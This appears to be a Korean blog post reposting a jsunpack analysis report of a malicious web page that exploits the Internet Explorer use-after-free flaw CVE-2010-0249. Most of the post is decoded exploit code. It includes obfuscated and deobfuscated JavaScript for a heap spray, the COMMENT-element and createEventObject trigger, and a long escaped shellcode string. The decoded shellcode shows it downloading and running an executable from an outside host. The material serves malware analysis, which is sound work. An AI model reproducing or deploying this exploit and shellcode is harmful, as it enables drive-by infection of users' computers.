JSUNPACK

2012. 2. 5. 19:28개발/해킹

JSUNPACK
A Generic JavaScript Unpacker
CAUTION: jsunpack was designed for security researchers and computer professionals
http://jsunpack.jeek.org/dec/go?report=8f3d0bc86a4041333de321f968d69d8c488b8812
다음 문서의 내용을 실행 할때 자바스크립트를 중지 하십시오

Submission permanent link 8f3d0bc86a4041333de321f968d69d8c488b8812 (Received 2010-10-21 07:26:09, img.js ) 

URL Status

All Malicious or Suspicious Elements of Submission

suspicious: script analysis exceeded 30 seconds (incomplete) 42953 bytes
malicious: Alert detected /alert CVE-2010-0249 MSIEUseAfterFree (CreateElement called 499 times)
suspicious: Warning detected /warning CVE-NO-MATCH Shellcode NOP len 523545 /warning CVE-NO-MATCH Shellcode Engine Binary Threshold /warning CVE-NO-MATCH Shellcode Engine Length 65536
suspicious: shellcode of length 1327/716
malicious: shellcode URL=www.yunsheng.com/images/s.exe
malicious: Alert detected /alert CVE-2010-0249 MSIEUseAfterFree (CreateElement called 999 times)
suspicious: Warning detected /warning CVE-NO-MATCH Shellcode Engine Length 65536
suspicious: shellcode of length 979/490
malicious: XOR key [shellcode]: 189
malicious: shellcode [xor] URL=www.yunsheng.com/images/s.exe
malicious: client download shellcode URL (executable) saved (559ea14179ed7dcefbba88302bcc8be6a307ea6b)


www.igo88.com/css/sky.html malicious
[malicious:10] (ipaddr:121.37.59.229) (iframe) www.igo88.com/css/sky.html
     status: (referer=www.google.com/trends/hottrends)saved 9835 bytes efd0bfa1e21c95ee6e90f3986c00ef72f94fce5c
     info: [decodingLevel=0] found JavaScript
     suspicious: script analysis exceeded 30 seconds (incomplete) 42953 bytes
     malicious: Alert detected /alert CVE-2010-0249 MSIEUseAfterFree (CreateElement called 499 times)
     suspicious: Warning detected /warning CVE-NO-MATCH Shellcode NOP len 523545 /warning CVE-NO-MATCH Shellcode Engine Binary Threshold /warning CVE-NO-MATCH Shellcode Engine Length 65536
     suspicious: shellcode of length 1327/716
     malicious: shellcode URL=www.yunsheng.com/images/s.exe
     info: [decodingLevel=1] found JavaScript
     error: undefined variable sNKc
     malicious: Alert detected /alert CVE-2010-0249 MSIEUseAfterFree (CreateElement called 999 times)
     suspicious: Warning detected /warning CVE-NO-MATCH Shellcode Engine Length 65536
     info: [decodingLevel=2] found JavaScript
     info: [3] no JavaScript
     info: file: saved www.igo88.com/css/sky.html to (efd0bfa1e21c95ee6e90f3986c00ef72f94fce5c)
     file: efd0bfa1e21c95ee6e90f3986c00ef72f94fce5c: 9835 bytes
     file: 827db97275c50f0fbdcd06c3211af9440e2c1cc7: 10076 bytes
     file: ddb8a49528a992cbed7615e83c331f86a7e65932: 42953 bytes
     file: 20de19d4441573e4af7d1dab8956d8a2df2254a9: 1327 bytes
     file: d153954059f16cb9f91edb12422c0d722d7de3e7: 67358 bytes
     file: 64a63eda847300a48b6a5dc71910bf5aaa679a16: 33127 bytes

Decoded Files
efd0/bfa1e21c95ee6e90f3986c00ef72f94fce5c from www.igo88.com/css/sky.html (9835 bytes, 9 hidden) download

<html><script> var XOd1dasaxlsxha861666a281y=""; payNKload26 = "&VPE890&VP034D&VP0000&VP0068&VP0020&VP6A00&VPFF00&VPB9D0&VP0800&VP0000&VPF88B&VP05EB&VPF35E&VPFFA4&VPE8D0&VPFFF6&VPFFFF&VP54E8&VP0003&VP8B00&VPE8F8&VP0038&VP0000&VP64E8&VP0001&VPE800&VP0046&VP0000&VPF2E8&VP0003&VP8B00&VPE8F8&VP0022&VP0000&VP5BE8&VP0001&VPE800&VP0030&VP0000&VPA0E8&VP0003&VP8B00&VPE8F8&VP000C&VP0000&VP78E8&VP0001&VPE800&VP001A&VP0000&VP58EB&VP8B53&VP53DC&VP406A&VP0068&VP0010&VP5700&VPC8E8&VP0002&VPE800&VP00FA&VP0000&VPC358&VP8B53&VP53DC&VP206A&VP0068&VP0010&VP5700&VPB0E8&VP0002&VPE800&VP00E2&VP0000&VPC358&VPE857&VP0453&VP0000&VPF88B&VPC933&VP3349&VPB0C0&VPFCC3&VPAEF2&VP478D&VP5FFF&VP5BC3&VPC63E&VPB807&VP893E&VP015F&VP3E66&VP47C7&VPFF05&VPC3E0&VPACE9&VP0004&VP5B00&VPEC81&VP0114&VP0000&VPD48B&VPC73E&VP6302&VP646D&VP3E20&VP42C7&VP2F04&VP2063&VP3E22&VP42C7&VP6308&VP646D&VP3E20&VP42C7&VP2F0C&VP2063&VP8322&VP10C2&VPC033&VP5050&VP0468&VP0001&VP5200&VP5053&VPC8E8&VP0003&VPE800&VP0072&VP0000&VPFC8B&VPC78B&VPC083&VP3E08&VP188A&VPDB84&VP0374&VPEB40&VP66F6&VPC73E&VP2200&VP3322&VP3ED2&VP5088&VP8302&VP54EC&VPC033&VPDB33&VPCC8B&VPF883&VP7D54&VP3E09&VP1C89&VP8308&VP04C0&VPF2EB&VPCC8B&VPD98B&VPC383&VP3310&VP3EC0&VP43C7&VP012C&VP0000&VP5100&VP5053&VP5050&VP5050&VP5750&VPE850&VP033B&VP0000&VP19E8&VP0000&VP6400&VP04A1&VP0000&VP8D00&VP60A0&VPFFFF&VPE8FF&VP0339&VP0000&VPDB33&VP5353&VP5353&VPD0FF&VP3880&VP74E9&VP8005&VPE838&VP0F75&VP7881&VP9005&VP4190&VP7490&VP5506&VPEC8B&VP408D&VPFF05&VPE8E0&VPFF17&VPFFFF&VPE8C3&VPFF11&VPFFFF&VP11B8&VP0401&VPC280&VP000C&VP04E8&VPFFFF&VP33FF&VP50C0&VPE854&VP0054&VP0000&VPE850&VP028B&VP0000&VPD0FF&VP8036&VP243C&VP7700&VPE80A&VP0241&VP0000&VPFF33&VPFF57&VPE8D0&VP01FB&VP0000&VPFF68&VP0000&VPFF00&VPE8D0&VPFED1&VPFFFF&VP5753&VP3356&VP50C0&VPE854&VP001E&VP0000&VPE850&VP0255&VP0000&VPD0FF&VP8036&VP243C&VP7700&VPE80A&VP020B&VP0000&VPFF33&VPFF57&VP58D0&VP5F5E&VPC35B&VP02EB&VPC358&VPF9E8&VPFFFF&VP56FF&VP8357&VP08EC&VPFC8B&VP086A&VP3E57&VP77FF&VPE814&VP025D&VP0000&VPD0FF&VPFC8B&VP6168&VP656D&VP6800&VP4549&VP7246&VPF48B&VP08B9&VP0000&VPF300&VP75A6&VP6A2F&VP3E00&VP74FF"+"&VP2024"+XOd1dasaxlsxha861666a281y+""+"&VP24E8&VP0002&VPFF00&VP8BD0&VPE8F8&VP01CB&VP0000&VPD0FF&VPF83B&VP0874&VP8B36&VP2444&VP3E20&VP00FF&VPFF3E&VP2474&VPE81C&VP01EF&VP0000&VPD0FF&VPC483&VP5F10&VPB85E&VP0001&VP0000&VP68C3&VP6E6F&VP0000&VP7568&VP6C72&VPEB6D&VP8D15&VP2444&VP5004&VP0BE8&VPFFFE&VP50FF&VP4AE8&VP0002&VPE900&VPFEE0&VPFFFF&VPE6E8&VPFFFF&VP83FF&VP08C4&VP6AC3&VP686C&VP746E&VP6C64&VP15EB&VP448D&VP0424&VPE850&VPFDE4&VPFFFF&VPE850&VP0223&VP0000&VPB9E9&VPFFFE&VPE8FF&VPFFE6&VPFFFF&VPC483&VPC308&VP3368&VP0032&VP6800&VP7375&VP7265&VP15EB&VP448D&VP0424&VPE850&VPFDBA&VPFFFF&VPE850&VP01F9&VP0000&VP8FE9&VPFFFE&VPE8FF&VPFFE6&VPFFFF&VPC483&VPC308&VP6368&VP7776&VP6800&VP6873&VP6F64&VP15EB&VP448D&VP0424&VPE850&VPFD90&VPFFFF&VPE850&VP01CF&VP0000&VP65E9&VPFFFE&VPE8FF&VPFFE6&VPFFFF&VPC483&VPC308&VP7668&VP7867&VPEB00&VP8D15&VP2444&VP5004&VP6BE8&VPFFFD&VP50FF&VPAAE8&VP0001&VPE900&VPFE40&VPFFFF&VPE6E8&VPFFFF&VP83FF&VP04C4&VPE8C3&VP01AB&VP0000&VP1B68&VP46C6&VP5079&VPC6E8&VP0001&VP8300&VP08C4&VPE8C3&VP0197&VP0000&VPEC68&VP0397&VP500C&VPB2E8&VP0001&VP8300&VP08C4&VPE8C3&VP0183&VP0000&VPAA68&VP0DFC&VP507C&VP9EE8&VP0001&VP8300&VP08C4&VPE8C3&VP016F&VP0000&VPED68&VPEF56&VP5036&VP8AE8&VP0001&VP8300&VP08C4&VPE8C3&VP015B&VP0000&VPF068&VP048A&VP505F&VP76E8&VP0001&VP8300&VP08C4&VPE8C3&VPFEF7&VPFFFF&VP7868&VPDB68&VP501C&VP62E8&VP0001&VP8300&VP08C4&VPE8C3&VP0133&VP0000&VPEF68&VPE0CE&VP5060&VP4EE8&VP0001&VP8300&VP08C4&VPE8C3&VP011F&VP0000&VPB068&VP2D49&VP50DB&VP3AE8&VP0001&VP8300&VP08C4&VPE8C3&VPFF36&VPFFFF&VPAB68&VP9B5E&VP501E&VP26E8&VP0001&VP8300&VP08C4&VPE8C3&VPFEA7&VPFFFF&VP5968&VP8197&VP5002&VP12E8&VP0001&VP8300&VP08C4&VPE8C3&VP00E3&VP0000&VP7E68&VPE2D8&VP5073&VPFEE8&VP0000&VP8300&VP08C4&VPE8C3&VP00CF&VP0000&VP9E68&VPBBF9&VP5035&VPEAE8&VP0000&VP8300&VP08C4&VPE8C3&VPFE92&VPFFFF&VP5768&VPB5A0&VP50BB&VPD6E8&VP0000&VP8300&VP08C4&VPE8C3&VPFE7E&VPFFFF&VP1A68&VP1E7A&VP5002&VPC2E8&VP0000&VP8300&VP08C4&VPE8C3&VPFE6A&VPFFFF&VPE068&VP305B&VP5094&VPAEE8&VP0000&VP8300&VP08C4&VPE8C3&VPFE56&VPFFFF&VP9768&VPE2C9&VP50A3&VP9AE8&VP0000&VP8300&VP08C4&VPE8C3&VPFE42&VPFFFF&VP6868&VPC524&VP50B3&VP86E8&VP0000&VP8300&VP08C4&VPE8C3&VP0057&VP0000&VP7268&VPB3FE&VP5016&VP72E8&VP0000&VP8300&VP08C4&VPE8C3&VPFE44&VPFFFF&VP13EB&VP656A&VPE850&VPFBE0&VPFFFF&VPE850&VPFEAB&VPFFFF&VPB5E9&VPFFFC&VPE8FF&VPFFE8&VPFFFF&VPE8C3&VPFDA9&VPFFFF&VP4F68&VP4FEF&VP5005&VP3EE8&VP0000&VP8300&VP08C4&VPE8C3&VP000F&VP0000&VP8E68&VP0E4E&VP50EC&VP2AE8&VP0000&VP8300&VP08C4&VP33C3&VP64C0&VP408B&VP8530&VP78C0&VP3E10&VP408B&VP3E0C&VP708B&VPAD1C&VP8B3E&VP0840&VPEBC3&VP3E0B&VP408B&VP8334&VP7CC0&VP8B3E&VP3C40&VP60C3&VP8B36&VP246C&VP3624&VP458B&VP363C&VP548B&VP7828&VPD503&VP8B3E&VP184A&VP8B3E&VP205A&VPDD03&VP3BE3&VP3E49&VP348B&VP038B&VP33F5&VP33FF&VPFCC0&VP84AC&VP74C0&VPC107&VP0DCF&VPF803&VPF4EB&VP3B36&VP247C&VP7528&VP3EDF&VP5A8B&VP0324&VP66DD&VP8B3E&VP4B0C&VP8B3E&VP1C5A&VPDD03&VP8B3E&VP8B04&VPC503&VP8936&VP2444&VP611C&VPE8C3&VPFB4F&VPFFFF&VP7468&VP7074&


827d/b97275c50f0fbdcd06c3211af9440e2c1cc7 from www.igo88.com/css/sky.html (10076 bytes, 8 hidden) download

navigator.systemLanguage=String("en"); navigator.browserLanguage=String("en"); document.lastModified=String(""); var location = new my_location("www.igo88.com/css/sky.html","www.igo88.com/css/sky.html");  idzzz.push('sp1'); valzzz.push(''); txtzzz.push('\x3cimg\x20src\x3d\x22img\x2egif\x22\x20onload\x3d\x22eNKv1\x28event\x29\x22\x20\x2f\x3e'); ; var XOd1dasaxlsxha861666a281y=""; payNKload26 = "&VPE890&VP034D&VP0000&VP0068&VP0020&VP6A00&VPFF00&VPB9D0&VP0800&VP0000&VPF88B&VP05EB&VPF35E&VPFFA4&VPE8D0&VPFFF6&VPFFFF&VP54E8&VP0003&VP8B00&VPE8F8&VP0038&VP0000&VP64E8&VP0001&VPE800&VP0046&VP0000&VPF2E8&VP0003&VP8B00&VPE8F8&VP0022&VP0000&VP5BE8&VP0001&VPE800&VP0030&VP0000&VPA0E8&VP0003&VP8B00&VPE8F8&VP000C&VP0000&VP78E8&VP0001&VPE800&VP001A&VP0000&VP58EB&VP8B53&VP53DC&VP406A&VP0068&VP0010&VP5700&VPC8E8&VP0002&VPE800&VP00FA&VP0000&VPC358&VP8B53&VP53DC&VP206A&VP0068&VP0010&VP5700&VPB0E8&VP0002&VPE800&VP00E2&VP0000&VPC358&VPE857&VP0453&VP0000&VPF88B&VPC933&VP3349&VPB0C0&VPFCC3&VPAEF2&VP478D&VP5FFF&VP5BC3&VPC63E&VPB807&VP893E&VP015F&VP3E66&VP47C7&VPFF05&VPC3E0&VPACE9&VP0004&VP5B00&VPEC81&VP0114&VP0000&VPD48B&VPC73E&VP6302&VP646D&VP3E20&VP42C7&VP2F04&VP2063&VP3E22&VP42C7&VP6308&VP646D&VP3E20&VP42C7&VP2F0C&VP2063&VP8322&VP10C2&VPC033&VP5050&VP0468&VP0001&VP5200&VP5053&VPC8E8&VP0003&VPE800&VP0072&VP0000&VPFC8B&VPC78B&VPC083&VP3E08&VP188A&VPDB84&VP0374&VPEB40&VP66F6&VPC73E&VP2200&VP3322&VP3ED2&VP5088&VP8302&VP54EC&VPC033&VPDB33&VPCC8B&VPF883&VP7D54&VP3E09&VP1C89&VP8308&VP04C0&VPF2EB&VPCC8B&VPD98B&VPC383&VP3310&VP3EC0&VP43C7&VP012C&VP0000&VP5100&VP5053&VP5050&VP5050&VP5750&VPE850&VP033B&VP0000&VP19E8&VP0000&VP6400&VP04A1&VP0000&VP8D00&VP60A0&VPFFFF&VPE8FF&VP0339&VP0000&VPDB33&VP5353&VP5353&VPD0FF&VP3880&VP74E9&VP8005&VPE838&VP0F75&VP7881&VP9005&VP4190&VP7490&VP5506&VPEC8B&VP408D&VPFF05&VPE8E0&VPFF17&VPFFFF&VPE8C3&VPFF11&VPFFFF&VP11B8&VP0401&VPC280&VP000C&VP04E8&VPFFFF&VP33FF&VP50C0&VPE854&VP0054&VP0000&VPE850&VP028B&VP0000&VPD0FF&VP8036&VP243C&VP7700&VPE80A&VP0241&VP0000&VPFF33&VPFF57&VPE8D0&VP01FB&VP0000&VPFF68&VP0000&VPFF00&VPE8D0&VPFED1&VPFFFF&VP5753&VP3356&VP50C0&VPE854&VP001E&VP0000&VPE850&VP0255&VP0000&VPD0FF&VP8036&VP243C&VP7700&VPE80A&VP020B&VP0000&VPFF33&VPFF57&VP58D0&VP5F5E&VPC35B&VP02EB&VPC358&VPF9E8&VPFFFF&VP56FF&VP8357&VP08EC&VPFC8B&VP086A&VP3E57&VP77FF&VPE814&VP025D&VP0000&VPD0FF&VPFC8B&VP6168&VP656D&VP6800&VP4549&VP7246&VPF48B&VP08B9&VP0000&VPF300&VP75A6&VP6A2F&VP3E00&VP74FF"+"&VP2024"+XOd1dasaxlsxha861666a281y+""+"&VP24E8&VP0002&VPFF00&VP8BD0&VPE8F8&VP01CB&VP0000&VPD0FF&VPF83B&VP0874&VP8B36&VP2444&VP3E20&VP00FF&VPFF3E&VP2474&VPE81C&VP01EF&VP0000&VPD0FF&VPC483&VP5F10&VPB85E&VP0001&VP0000&VP68C3&VP6E6F&VP0000&VP7568&VP6C72&VPEB6D&VP8D15&VP2444&VP5004&VP0BE8&VPFFFE&VP50FF&VP4AE8&VP0002&VPE900&VPFEE0&VPFFFF&VPE6E8&VPFFFF&VP83FF&VP08C4&VP6AC3&VP686C&VP746E&VP6C64&VP15EB&VP448D&VP0424&VPE850&VPFDE4&VPFFFF&VPE850&VP0223&VP0000&VPB9E9&VPFFFE&VPE8FF&VPFFE6&VPFFFF&VPC483&VPC308&VP3368&VP0032&VP6800&VP7375&VP7265&VP15EB&VP448D&VP0424&VPE850&VPFDBA&VPFFFF&VPE850&VP01F9&VP0000&VP8FE9&VPFFFE&VPE8FF&VPFFE6&VPFFFF&VPC483&VPC308&VP6368&VP7776&VP6800&VP6873&VP6F64&VP15EB&VP448D&VP0424&VPE850&VPFD90&VPFFFF&VPE850&VP01CF&VP0000&VP65E9&VPFFFE&VPE8FF&VPFFE6&VPFFFF&VPC483&VPC308&VP7668&VP7867&VPEB00&VP8D15&VP2444&VP5004&VP6BE8&VPFFFD&VP50FF&VPAAE8&VP0001&VPE900&VPFE40&VPFFFF&VPE6E8&VPFFFF&VP83FF&VP04C4&VPE8C3&VP01AB&VP0000&VP1B68&VP46C6&VP5079&VPC6E8&VP0001&VP8300&VP08C4&VPE8C3&VP0197&VP0000&VPEC68&VP0397&VP500C&VPB2E8&VP0001&VP8300&VP08C4&VPE8C3&VP0183&VP0000&VPAA68&VP0DFC&VP507C&VP9EE8&VP0001&VP8300&VP08C4&VPE8C3&VP016F&VP0000&VPED68&VPEF56&VP5036&VP8AE8&VP0001&VP8300&VP08C4&VPE8C3&VP015B&VP0000&VPF068&VP048A&VP505F&VP76E8&VP0001&VP8300&VP08C4&VPE8C3&VPFEF7&VPFFFF&VP7868&VPDB68&VP501C&VP62E8&VP0001&VP8300&VP08C4&VPE8C3&VP0133&VP0000&VPEF68&VPE0CE&VP5060&VP4EE8&VP0001&VP8300&VP08C4&VPE8C3&VP011F&VP0000&VPB068&VP2D49&VP50DB&VP3AE8&VP0001&VP8300&VP08C4&VPE8C3&VPFF36&VPFFFF&VPAB68&VP9B5E&VP501E&VP26E8&VP0001&VP8300&VP08C4&VPE8C3&VPFEA7&VPFFFF&VP5968&VP8197&VP5002&VP12E8&VP0001&VP8300&VP08C4&VPE8C3&VP00E3&VP0000&VP7E68&VPE2D8&VP5073&VPFEE8&VP0000&VP8300&VP08C4&VPE8C3&VP00CF&VP0000&VP9E68&VPBBF9&VP5035&VPEAE8&VP0000&VP8300&VP08C4&VPE8C3&VPFE92&VPFFFF&VP5768&VPB5A0&VP50BB&VPD6E8&VP0000&VP8300&VP08C4&VPE8C3&VPFE7E&VPFFFF&VP1A68&VP1E7A&VP5002&VPC2E8&VP0000&VP8300&VP08C4&VPE8C3&VPFE6A&VPFFFF&VPE068&VP305B&VP5094&VPAEE8&VP0000&VP8300&VP08C4&VPE8C3&VPFE56&VPFFFF&VP9768&VPE2C9&VP50A3&VP9AE8&VP0000&VP8300&VP08C4&VPE8C3&VPFE42&VPFFFF&VP6868&VPC524&VP50B3&VP86E8&VP0000&VP8300&VP08C4&VPE8C3&VP0057&VP0000&VP7268&VPB3FE&VP5016&VP72E8&VP0000&VP8300&VP08C4&VPE8C3&VPFE44&VPFFFF&VP13EB&VP656A&VPE850&VPFBE0&VPFFFF&VPE850&VPFEAB&VPFFFF&VPB5E9&VPFFFC&VPE8FF&VPFFE8&VPFFFF&VPE8C3&VPFDA9&VPFFFF&VP4F68&VP4FEF&VP5005&VP3EE8&VP0000&VP8300&VP08C4&VPE8C3&VP000F&VP0000&VP8E68&VP0E4E&VP50EC&VP2AE8&VP0000&VP8300&VP08C4&VP33C3&VP64C0&VP408B&VP8530&VP78C0&VP3E10&VP408B&VP3E0C&VP708B&VPAD1C&VP8B3E&VP0840&VPEBC3&VP3E0B&VP408B&VP8334&VP7CC0&VP8B3E&VP3C40&VP60C3&VP8B36&VP2


ddb8/a49528a992cbed7615e83c331f86a7e65932 from www.igo88.com/css/sky.html (42953 bytes, 42 hidden) download

 //eval eval("\166\141\162\40\163\144\153\154\147\154\170\153\66\75\42\141\66\61\70\145\66\70\66\70\42\73\15\12\166\141\162\40\156\75\165\156\145\163\143\141\160\145\50\42\45\165\60\143\60\144\45\165\60\143\60\144\42\51\73\15\12\167\150\151\154\145\50\156\56\154\145\156\147\164\150\74\75\65\62\64\62\70\70\51\156\53\75\156\73\15\12\156\75\156\56\163\165\142\163\164\162\151\156\147\50\60\54\65\62\64\62\66\71\55\163\116\113\143\56\154\145\156\147\164\150\51\73\15\12\166\141\162\40\170\60\75\156\145\167\40\101\162\162\141\171\50\51\73\15\12\146\157\162\50\166\141\162\40\151\75\60\73\151\74\62\60\60\73\151\53\53\51\173\15\12\11\170\60\133\151\135\75\156\53\163\116\113\143\15\12\175\15\12\166\141\162\40\170\116\113\61\75\156\145\167\40\101\162\162\141\171\50\51\73\15\12\166\141\162\40\163\153\170\144\154\62\66\75\42\141\163\144\61\70\66\61\66\141\144\62\66\42\73\15\12\146\157\162\50\151\75\60\73\151\74\65\60\60\73\151\53\53\51\173\15\12\11\170\116\113\61\133\151\135\75\144\157\143\165\155\145\156\164\56\143\162\145\141\164\145\105\154\145\155\145\156\164\50\42\103\117\115\115\105\116\124\42\51\73\15\12\11\170\116\113\61\133\151\135\56\144\141\164\141\75\42\141\142\143\42\15\12\175\73\15\12\166\141\162\40\145\61\75\156\165\154\154\73\15\12\146\165\156\143\164\151\157\156\40\145\116\113\166\61\50\114\106\123\157\153\114\120\101\171\61\51\173\15\12\11\145\61\75\167\151\156\144\157\167\133\42\134\170\66\64\134\170\66\146\134\170\66\63\134\170\67\65\134\170\66\144\134\170\66\65\134\170\66\145\134\170\67\64\42\135\133\42\134\170\66\63\134\170\67\62\134\170\66\65\134\170\66\61\134\170\67\64\134\170\66\65\134\170\64\65\134\170\67\66\134\170\66\65\134\170\66\145\134\170\67\64\134\170\64\146\134\170\66\62\134\170\66\141\134\170\66\65\134\170\66\63\134\170\67\64\42\135\50\114\106\123\157\153\114\120\101\171\61\51\73\15\12\11\167\151\156\144\157\167\133\42\134\170\66\64\134\170\66\146\134\170\66\63\134\170\67\65\134\170\66\144\134\170\66\65\134\170\66\145\134\170\67\64\42\135\133\42\134\170\66\67\134\170\66\65\134\170\67\64\134\170\64\65\134\170\66\143\134\170\66\65\134\170\66\144\134\170\66\65\134\170\66\145\134\170\67\64\134\170\64\62\134\170\67\71\134\170\64\71\134\170\66\64\42\135\50\42\134\170\67\63\134\170\67\60\134\170\63\61\42\51\133\42\134\170\66\71\134\170\66\145\134\170\66\145\134\170\66\65\134\170\67\62\134\170\64\70\134\170\65\64\134\170\64\144\134\170\64\143\42\135\75\42\42\73\15\12\11\167\151\156\144\157\167\133\42\134\170\67\63\134\170\66\65\134\170\67\64\134\170\64\71\134\170\66\145\134\170\67\64\134\170\66\65\134\170\67\62\134\170\67\66\134\170\66\61\134\170\66\143\42\135\50\145\166\116\113\62\54\65\60\51\15\12\175\15\12\146\165\156\143\164\151\157\156\40\145\166\116\113\62\50\51\173\15\12\11\160\153\75\42\134\165\60\143\60\144\134\165\60\143\60\144\134\165\60\143\60\144\134\165\60\143\60\144\134\165\60\143\60\144\134\165\60\143\60\144\134\165\60\143\60\144\134\165\60\143\60\144\134\165\60\143\60\144\134\165\60\143\60\144\134\165\60\143\60\144\134\165\60\143\60\144\134\165\60\143\60\144\134\165\60\143\60\144\134\165\60\143\60\144\134\165\60\143\60\144\134\165\60\143\60\144\134\165\60\143\60\144\134\165\60\143\60\144\134\165\60\143\60\144\134\165\60\143\60\144\134\165\60\143\60\144\134\165\60\143\60\144\134\165\60\143\60\144\134\165\60\143\60\144\134\165\60\143\60\144\134\165\60\143\60\144\134\165\60\143\60\144\134\165\60\143\60\144\134\165\60\143\60\144\134\165\60\143\60\144\134\165\60\143\60\144\134\165\60\143\60\144\134\165\60\143\60\144\134\165\60\143\60\144\134\165\60\143\60\144\134\165\60\143\60\144\134\165\60\143\60\144\134\165\60\143\60\144\134\165\60\143\60\144\134\165\60\143\60\144\134\165\60\143\60\144\42\73\15\12\11\146\157\162\50\151\75\60\73\151\74\170\116\113\61\56\154\145\156\147\164\150\73\151\53\53\51\173\15\12\11\11\170\116\113\61\133\151\135\56\144\141\164\141\75\160\153\15\12\11\175\73\15\12\166\141\162\40\163\153\170\144\154\75\42\141\163\144\61\70\66\61\66\141\144\66\42\73\15\12\166\141\162\40\144\163\141\154\152\147\144\157\75\42\42\73\15\12\11\132\120\105\102\61\75\145\61\133\42\134\170\67\63\134\170\67\62\134\170\66\63\134\170\64\65\134\170\66\143\134\170\66\65\134\170\66\144\134\170\66\65\134\170\66\145\42\53\144\163\141\154\152\147\144\157\53\42\134\170\67\64\42\135\73\15\12\166\141\162\40\165\157\163\154\172\154\66\75\42\141\66\61\70\145\66\70\66\70\42\73\15\12\15\12\175")  //eval var sdklglxk6="a618e6868"; var n=unescape("%u0c0d%u0c0d"); while(n.length<=524288)n+=n; n=n.substring(0,524269-sNKc.length); var x0=new Array(); for(var i=0;i<200;i++){ x0[i]=n+sNKc } var xNK1=new Array(); var skxdl26="asd18616ad26"; for(i=0;i<500;i++){ xNK1[i]=document.createElement("COMMENT"); xNK1[i].data="abc" }; var e1=null; function eNKv1(LFSokLPAy1){ e1=window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x63\x72\x65\x61\x74\x65\x45\x76\x65\x6e\x74\x4f\x62\x6a\x65\x63\x74"](LFSokLPAy1); window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64"]("\x73\x70\x31")[



20de/19d4441573e4af7d1dab8956d8a2df2254a9 from www.igo88.com/css/sky.html (1327 bytes, 875 hidden) download

Mh j^T8dF"[0xXSSj@hWXSSj hWXWS3I3G_[>>_f>G[>cmd >B/c ">Bcmd >B/c "3PPhRSPr>t@f>""3>PT33T}>3>C,QSPPPPPPWP;d`93SSSS8t8uxAtU@3PTTP6<$w A3WhSWV3PTPU6<$w 3WX^_[XVWjW>w]hamehIEFru/j>t$ $;t6D$ >>t$_^honhurlmD$PPJjlhntdlD$PP#h32huserD$PPhcvwhshdoD$PPehvgxD$PkP@hFyPhPh|PohV6P[h_PvhxhPb3h`PNhI-P:6h^P&hYPh~sPh5PhWP~hzPjh[0PVhPBhh$PWhrPrDjePPhOOP>hNP*3d@0x>@>p>@>@4|>@<`6l$$6E<6T(x>J>Z ;I>433t6;|$(u>Z$f>K>Z>6D$aOhttp://www.yunsheng.com/images/s.exe


d153/954059f16cb9f91edb12422c0d722d7de3e7 from www.igo88.com/css/sky.html (67358 bytes, 42 hidden) download

 //eval var sdklglxk6="a618e6868"; var n=unescape("%u0c0d%u0c0d"); while(n.length<=524288)n+=n; n=n.substring(0,524269-sNKc.length); var x0=new Array(); for(var i=0;i<200;i++){ x0[i]=n+sNKc } var xNK1=new Array(); var skxdl26="asd18616ad26"; for(i=0;i<500;i++){ xNK1[i]=document.createElement("COMMENT"); xNK1[i].data="abc" }; var e1=null; function eNKv1(LFSokLPAy1){ e1=window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x63\x72\x65\x61\x74\x65\x45\x76\x65\x6e\x74\x4f\x62\x6a\x65\x63\x74"](LFSokLPAy1); window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64"]("\x73\x70\x31")["\x69\x6e\x6e\x65\x72\x48\x54\x4d\x4c"]=""; window["\x73\x65\x74\x49\x6e\x74\x65\x72\x76\x61\x6c"](evNK2,50) } function evNK2(){ pk="\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d"; for(i=0;i<xNK1.length;i++){ xNK1[i].data=pk }; var skxdl="asd18616ad6"; var dsaljgdo=""; ZPEB1=e1["\x73\x72\x63\x45\x6c\x65\x6d\x65\x6e"+dsaljgdo+"\x74"]; var uoslzl6="a618e6868";  }  //warning CVE-NO-MATCH Shellcode Engine Length 65536 //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement 